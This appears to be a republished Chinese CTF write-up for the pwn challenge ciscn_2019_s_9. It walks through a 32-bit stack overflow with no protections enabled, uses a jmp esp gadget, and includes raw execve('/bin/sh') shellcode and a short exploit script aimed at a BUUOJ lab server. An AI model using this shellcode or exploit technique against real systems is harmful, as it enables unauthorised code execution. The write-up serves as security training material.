码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • ciscn_2019_s_9


    ciscn_2019_s_9

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    32位,啥也没开,开心愉悦写shellcode

    int pwn()
    {
      char s[24]; // [esp+8h] [ebp-20h]
    
      puts("\nHey! ^_^");
      puts("\nIt's nice to meet you");
      puts("\nDo you have anything to tell?");
      puts(">");
      fflush(stdout);
      fgets(s, 0x32, stdin);
      puts("OK bye~");
      fflush(stdout);
      return 1;
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14

    程序主要在这里,栈溢出,写shellcode进去然后执行,发现有个hint

    .text:08048551                 push    ebp
    .text:08048552                 mov     ebp, esp
    .text:08048554                 jmp     esp
    .text:08048554 hint            endp
    .text:08048554
    .text:08048554 ; ---------------------------------------------------------------------------
    .text:08048556                 db 90h
    .text:08048557 ; ---------------------------------------------------------------------------
    .text:08048557                 pop     ebp
    .text:08048558                 retn
    .text:08048558 ; } // starts at 8048551
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11

    这里有个jmp,ok好办了

    思路

    写shellcode,然后用jmp跳转到shellcode的头,然后执行shellcode

    因为栈只有0x20大小,所以不能使用pwntools生成的shellcode

    \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
    
    • 1

    这个是0x17大小的shellcode,平时收集的

    #from pwn import*
    #from Yapack import *
    r,elf=rec("node4.buuoj.cn",28508,"./pwn",10)
    context(os='linux', arch='i386',log_level='debug')
    #debug('b *0x400649')
    #debug('b *$rebase(0x1373)')
    
    sc=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
    pl=ljust(sc,0x24)+p32(0x8048554)+asm('sub esp,0x28;call esp')
    sla(b'>',pl)
    
    ia()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12

    在这里插入图片描述

  • 相关阅读:
    Android一些新的技术栈,你都会哪些?
    万星开源项目:System Design Primer - 学习系统设计的必备指南
    数据库的范式
    踩坑了!0作为除数,不一定会抛出异常!
    [MySQL]order by失效
    什么是3D摄影机,与普通摄影机有什么不同?
    Vim学习笔记
    centos7安装mysql8
    ARMv8 cache的包含策略inclusive 和 exclusive之间的区别以及Cortex-A55示例详解
    Matlab渐变颜色图(colormap)生成/编辑器—ColorMap
  • 原文地址:https://blog.csdn.net/qq_62887641/article/details/133471107
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号